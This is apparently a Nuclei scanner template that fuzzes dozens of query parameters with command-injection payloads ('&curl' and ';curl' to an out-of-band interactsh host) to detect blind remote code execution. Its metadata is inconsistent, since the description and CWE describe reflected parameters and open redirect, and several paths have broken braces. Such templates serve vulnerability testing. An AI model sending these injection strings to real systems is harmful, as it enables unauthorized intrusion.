http:
- matchers:
  - part: interactsh_protocol
    type: word
    words:
    - http
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?assert_code=wwww%3Bcurl+{{interactsh-url}}&assert_eval=wwww%3Bcurl+{{interactsh-url}}&assert_php=wwww%3Bcurl+{{interactsh-url}}&assert_template=wwww%3Bcurl+{{interactsh-url}}&eval_shell=wwww%3Bcurl+{{interactsh-url}}&exec_shell=wwww%3Bcurl+{{interactsh-url}}&shell_eval=wwww%3Bcurl+{{interactsh-url}}'
  - '{{BaseURL}}?cmd=wwww%26curl+{{interactsh-url}}&command=wwww%26curl+{{interactsh-url}}&exec=wwww%26curl+{{interactsh-url}}&execute=wwww%26curl+{{interactsh-url}}&payload=wwww%26curl+{{interactsh-url}}&code=wwww%26curl+{{interactsh-url}}&shell=wwww%26curl+{{interactsh-url}}&s'
  - '{{BaseURL}}?cript=wwww%26curl+{{interactsh-url}}&system=wwww%26curl+{{interactsh-url}}&run=wwww%26curl+{{interactsh-url}}&eval=wwww%26curl+{{interactsh-url}}&proc=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?eval_base64=wwww%26curl+{{interactsh-url}}&include=wwww%26curl+{{interactsh-url}}&require=wwww%26curl+{{interactsh-url}}&load=wwww%26curl+{{interactsh-url}}&open=wwww%26curl+{{interactsh-url}}&read=wwww%26curl+{{interactsh-url}}&write=wwww%26curl+{{interactsh-url}}&fetch=wwww%26curl+{{interactsh-url}}&wget=wwww%26curl+{{interactsh-url}}&curl=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?backtick_cmd=wwww%26curl+{{interactsh-url}}&os_cmd=wwww%26curl+{{interactsh-url}}&exec_cmd=wwww%26curl+{{interactsh-url}}&proc_open=wwww%26curl+{{interactsh-url}}&popen=wwww%26curl+{{interactsh-url}}&passthru=wwww%26curl+{{interactsh-url}}&system_exec=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?system_cmd=wwww%26curl+{{interactsh-url}}&system_command=wwww%26curl+{{interactsh-url}}&system_shell=wwww%26curl+{{interactsh-url}}&shell_exec=wwww%26curl+{{interactsh-url}}&assert=wwww%26curl+{{interactsh-url}}&assertion=wwww%26curl+{{interactsh-url}}&assert_code=wwww%26curl+{{interactsh-url}}&assert_eval=wwww%26curl+{{interactsh-url}}&assert_php=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?assert_template=wwww%26curl+{{interactsh-url}}&eval_shell=wwww%26curl+{{interactsh-url}}&exec_shell=wwww%26curl+{{interactsh-url}}&shell_eval=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?cmd_exec=wwww%26curl+{{interactsh-url}}&shell_cmd=wwww%26curl+{{interactsh-url}}&run_cmd=wwww%26curl+{{interactsh-url}}&action=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?execute_cmd=wwww%26curl+{{interactsh-url}}&exec_payload=wwww%26curl+{{interactsh-url}}&shellcode=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?command_exec=wwww%26curl+{{interactsh-url}}&run_shell=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?process=wwww%26curl+{{interactsh-url}}&proc_execute=wwww%26curl+{{interactsh-url}}&spawn_shell=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?loadfile=wwww%26curl+{{interactsh-url}}&import=wwww%26curl+{{interactsh-url}}&phar=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?eval_input=wwww%26curl+{{interactsh-url}}&do=wwww%26curl+{{interactsh-url}}&sh=wwww%26curl+{{interactsh-url}}'
  - '{BaseURL}}?cmdline=wwww%26curl+{{interactsh-url}}&call=wwww%26curl+{{interactsh-url}}&exec_runtime=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?rce=wwww%26curl+{{interactsh-url}}&remote_cmd=wwww%26curl+{{interactsh-url}}&server_cmd=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?system_command_exec=wwww%26curl+{{interactsh-url}}&process_cmd=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?exec_runtime_cmd=wwww%26curl+{{interactsh-url}}&process_shell=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?invoke=wwww%26curl+{{interactsh-url}}&trigger=wwww%26curl+{{interactsh-url}}&start=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?call_cmd=wwww%26curl+{{interactsh-url}}&interpreter=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?script_exec=wwww%26curl+{{interactsh-url}}&runtime_exec=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?shell_run=wwww%26curl+{{interactsh-url}}&system_run=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?cmd_execute=wwww%26curl+{{interactsh-url}}&command_run=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?interpreter_cmd=wwww%26curl+{{interactsh-url}}&php_cmd=wwww%26curl+{{interactsh-url}}'
  - '{{BaseURL}}?id=%26curl+{{interactsh-url}}'
id: 6rcepost-40
info:
  author: erickfernandox_rce1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 6rcepost
  severity: medium
  tags: fuzzer, generic
